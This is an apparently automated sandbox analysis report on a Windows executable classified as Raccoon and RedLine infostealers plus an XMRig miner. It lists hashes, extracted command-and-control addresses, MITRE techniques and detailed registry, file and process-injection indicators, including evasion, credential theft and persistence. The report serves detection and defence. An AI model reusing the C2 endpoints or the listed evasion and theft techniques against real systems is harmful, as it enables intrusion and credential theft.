raccoon | a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f

Analysis

max time kernel
300s
max time network
297s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
18-10-2022 22:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe
Size

345KB
MD5

caf164a291c1106cc0edf0787086f545
SHA1

78225d38139be94e8c151bdeaa02b07e149cca53
SHA256

a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f
SHA512

d9735421019c26646c0106d5154de5bc28aa4c170f218bac39394bf8b90d771987413d95a26c5814b7d200a1dadf8d64fe59dac5134bac468cf7939173077c90
SSDEEP

6144:P6S1ZVlum8KDJUOER/YMF8yC4ohoTtyvbO7IOJFhkgG28g+8:bPmcUOI6yC4orbOMOvG283

Score

10^/10

raccoon redline xmrig 875784825 ce21570f8b07f4e68bfb7f44917635b1 discovery evasion infostealer miner spyware stealer themida trojan upx

Malware Config

Extracted

Family

raccoon

Botnet

ce21570f8b07f4e68bfb7f44917635b1

http://77.73.133.7/

rc4.plain

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/100468-652-0x00000000049C972E-mapping.dmp	family_redline
behavioral2/memory/100468-692-0x00000000049B0000-0x00000000049CE000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup32.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/6936-1505-0x00007FF712ED0000-0x00007FF7136C4000-memory.dmp	xmrig
behavioral2/memory/6936-1508-0x00007FF712ED0000-0x00007FF7136C4000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

18 4684 WScript.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup32.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup32.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 8 IoCs

Processes:

setup.exesetup32.exesetup3221.exe222.exe2.0.2-beta.exewatchdog.exeupdater.exeMoUSO.exe

pid process

2644 setup.exe
4520 setup32.exe
3760 setup3221.exe
4776 222.exe
2024 2.0.2-beta.exe
4528 watchdog.exe
100580 updater.exe
101088 MoUSO.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
18	4684	WScript.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup32.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/6936-1505-0x00007FF712ED0000-0x00007FF7136C4000-memory.dmp	upx
behavioral2/memory/6936-1508-0x00007FF712ED0000-0x00007FF7136C4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup32.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	setup.exe
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	MoUSO.exe

Loads dropped DLL 3 IoCs

Processes:

2.0.2-beta.exe

pid process

2024 2.0.2-beta.exe
2024 2.0.2-beta.exe
2024 2.0.2-beta.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2024	2.0.2-beta.exe
2024	2.0.2-beta.exe
2024	2.0.2-beta.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4520-238-0x00007FF7F8A10000-0x00007FF7F96A9000-memory.dmp	themida
behavioral2/memory/4520-357-0x00007FF7F8A10000-0x00007FF7F96A9000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4520-632-0x00007FF7F8A10000-0x00007FF7F96A9000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/100580-685-0x00007FF7D2A60000-0x00007FF7D36F9000-memory.dmp	themida
behavioral2/memory/100580-750-0x00007FF7D2A60000-0x00007FF7D36F9000-memory.dmp	themida
behavioral2/memory/100580-1503-0x00007FF7D2A60000-0x00007FF7D36F9000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup32.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup32.exeupdater.exeMoUSO.exe

pid process

2644 setup.exe
4520 setup32.exe
100580 updater.exe
101088 MoUSO.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 2124 set thread context of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 4528 set thread context of 100468	4528	watchdog.exe	vbc.exe
PID 100580 set thread context of 6796	100580	updater.exe	conhost.exe
PID 100580 set thread context of 6936	100580	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup32.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1872 sc.exe
5520 sc.exe
5552 sc.exe
5608 sc.exe
5672 sc.exe
4532 sc.exe
4340 sc.exe
5456 sc.exe
3588 sc.exe
3524 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

744 schtasks.exe

pid	process
1872	sc.exe
5520	sc.exe
5552	sc.exe
5608	sc.exe
5672	sc.exe
4532	sc.exe
4340	sc.exe
5456	sc.exe
3588	sc.exe
3524	sc.exe

pid	process
744	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

setup3221.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings setup3221.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	setup3221.exe

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exepowershell.exepowershell.exepowershell.exeMoUSO.exe

pid	process
2644	setup.exe
2644	setup.exe
4888	powershell.exe
4888	powershell.exe
4888	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
56756	powershell.exe
56756	powershell.exe
56756	powershell.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe
101088	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

628

pid	process
628

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeIncreaseQuotaPrivilege	4888	powershell.exe
Token: SeSecurityPrivilege	4888	powershell.exe
Token: SeTakeOwnershipPrivilege	4888	powershell.exe
Token: SeLoadDriverPrivilege	4888	powershell.exe
Token: SeSystemProfilePrivilege	4888	powershell.exe
Token: SeSystemtimePrivilege	4888	powershell.exe
Token: SeProfSingleProcessPrivilege	4888	powershell.exe
Token: SeIncBasePriorityPrivilege	4888	powershell.exe
Token: SeCreatePagefilePrivilege	4888	powershell.exe
Token: SeBackupPrivilege	4888	powershell.exe
Token: SeRestorePrivilege	4888	powershell.exe
Token: SeShutdownPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeSystemEnvironmentPrivilege	4888	powershell.exe
Token: SeRemoteShutdownPrivilege	4888	powershell.exe
Token: SeUndockPrivilege	4888	powershell.exe
Token: SeManageVolumePrivilege	4888	powershell.exe
Token: 33	4888	powershell.exe
Token: 34	4888	powershell.exe
Token: 35	4888	powershell.exe
Token: 36	4888	powershell.exe
Token: SeShutdownPrivilege	3996	powercfg.exe
Token: SeCreatePagefilePrivilege	3996	powercfg.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeShutdownPrivilege	4164	powercfg.exe
Token: SeCreatePagefilePrivilege	4164	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	4736	powercfg.exe
Token: SeCreatePagefilePrivilege	4736	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4480	powershell.exe
Token: SeSecurityPrivilege	4480	powershell.exe
Token: SeTakeOwnershipPrivilege	4480	powershell.exe
Token: SeLoadDriverPrivilege	4480	powershell.exe
Token: SeSystemProfilePrivilege	4480	powershell.exe
Token: SeSystemtimePrivilege	4480	powershell.exe
Token: SeProfSingleProcessPrivilege	4480	powershell.exe
Token: SeIncBasePriorityPrivilege	4480	powershell.exe
Token: SeCreatePagefilePrivilege	4480	powershell.exe
Token: SeBackupPrivilege	4480	powershell.exe
Token: SeRestorePrivilege	4480	powershell.exe
Token: SeShutdownPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeSystemEnvironmentPrivilege	4480	powershell.exe
Token: SeRemoteShutdownPrivilege	4480	powershell.exe
Token: SeUndockPrivilege	4480	powershell.exe
Token: SeManageVolumePrivilege	4480	powershell.exe
Token: 33	4480	powershell.exe
Token: 34	4480	powershell.exe
Token: 35	4480	powershell.exe
Token: 36	4480	powershell.exe
Token: SeIncreaseQuotaPrivilege	4480	powershell.exe
Token: SeSecurityPrivilege	4480	powershell.exe
Token: SeTakeOwnershipPrivilege	4480	powershell.exe
Token: SeLoadDriverPrivilege	4480	powershell.exe
Token: SeSystemProfilePrivilege	4480	powershell.exe
Token: SeSystemtimePrivilege	4480	powershell.exe
Token: SeProfSingleProcessPrivilege	4480	powershell.exe
Token: SeIncBasePriorityPrivilege	4480	powershell.exe
Token: SeCreatePagefilePrivilege	4480	powershell.exe
Token: SeBackupPrivilege	4480	powershell.exe
Token: SeRestorePrivilege	4480	powershell.exe
Token: SeShutdownPrivilege	4480	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exeRegSvcs.exesetup.exesetup3221.exe222.exesetup32.execmd.execmd.exe

description	pid	process	target process
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 2124 wrote to memory of 400	2124	a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe	RegSvcs.exe
PID 400 wrote to memory of 2644	400	RegSvcs.exe	setup.exe
PID 400 wrote to memory of 2644	400	RegSvcs.exe	setup.exe
PID 400 wrote to memory of 2644	400	RegSvcs.exe	setup.exe
PID 2644 wrote to memory of 744	2644	setup.exe	schtasks.exe
PID 2644 wrote to memory of 744	2644	setup.exe	schtasks.exe
PID 2644 wrote to memory of 744	2644	setup.exe	schtasks.exe
PID 400 wrote to memory of 4520	400	RegSvcs.exe	setup32.exe
PID 400 wrote to memory of 4520	400	RegSvcs.exe	setup32.exe
PID 400 wrote to memory of 3760	400	RegSvcs.exe	setup3221.exe
PID 400 wrote to memory of 3760	400	RegSvcs.exe	setup3221.exe
PID 400 wrote to memory of 3760	400	RegSvcs.exe	setup3221.exe
PID 3760 wrote to memory of 4684	3760	setup3221.exe	WScript.exe
PID 3760 wrote to memory of 4684	3760	setup3221.exe	WScript.exe
PID 3760 wrote to memory of 4684	3760	setup3221.exe	WScript.exe
PID 3760 wrote to memory of 4776	3760	setup3221.exe	222.exe
PID 3760 wrote to memory of 4776	3760	setup3221.exe	222.exe
PID 3760 wrote to memory of 4776	3760	setup3221.exe	222.exe
PID 4776 wrote to memory of 2024	4776	222.exe	2.0.2-beta.exe
PID 4776 wrote to memory of 2024	4776	222.exe	2.0.2-beta.exe
PID 4776 wrote to memory of 2024	4776	222.exe	2.0.2-beta.exe
PID 4520 wrote to memory of 4888	4520	setup32.exe	powershell.exe
PID 4520 wrote to memory of 4888	4520	setup32.exe	powershell.exe
PID 4520 wrote to memory of 2736	4520	setup32.exe	cmd.exe
PID 4520 wrote to memory of 2736	4520	setup32.exe	cmd.exe
PID 4520 wrote to memory of 2640	4520	setup32.exe	cmd.exe
PID 4520 wrote to memory of 2640	4520	setup32.exe	cmd.exe
PID 4520 wrote to memory of 4480	4520	setup32.exe	powershell.exe
PID 4520 wrote to memory of 4480	4520	setup32.exe	powershell.exe
PID 2736 wrote to memory of 4532	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 4532	2736	cmd.exe	sc.exe
PID 2640 wrote to memory of 3996	2640	cmd.exe	powercfg.exe
PID 2640 wrote to memory of 3996	2640	cmd.exe	powercfg.exe
PID 2736 wrote to memory of 3588	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 3588	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 4340	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 4340	2736	cmd.exe	sc.exe
PID 2640 wrote to memory of 4164	2640	cmd.exe	powercfg.exe
PID 2640 wrote to memory of 4164	2640	cmd.exe	powercfg.exe
PID 2736 wrote to memory of 1872	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 1872	2736	cmd.exe	sc.exe
PID 2640 wrote to memory of 4556	2640	cmd.exe	powercfg.exe
PID 2640 wrote to memory of 4556	2640	cmd.exe	powercfg.exe
PID 2736 wrote to memory of 3524	2736	cmd.exe	sc.exe
PID 2736 wrote to memory of 3524	2736	cmd.exe	sc.exe
PID 2640 wrote to memory of 4736	2640	cmd.exe	powercfg.exe
PID 2640 wrote to memory of 4736	2640	cmd.exe	powercfg.exe
PID 2736 wrote to memory of 4468	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4468	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4424	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4424	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4644	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4644	2736	cmd.exe	reg.exe
PID 2736 wrote to memory of 4668	2736	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe
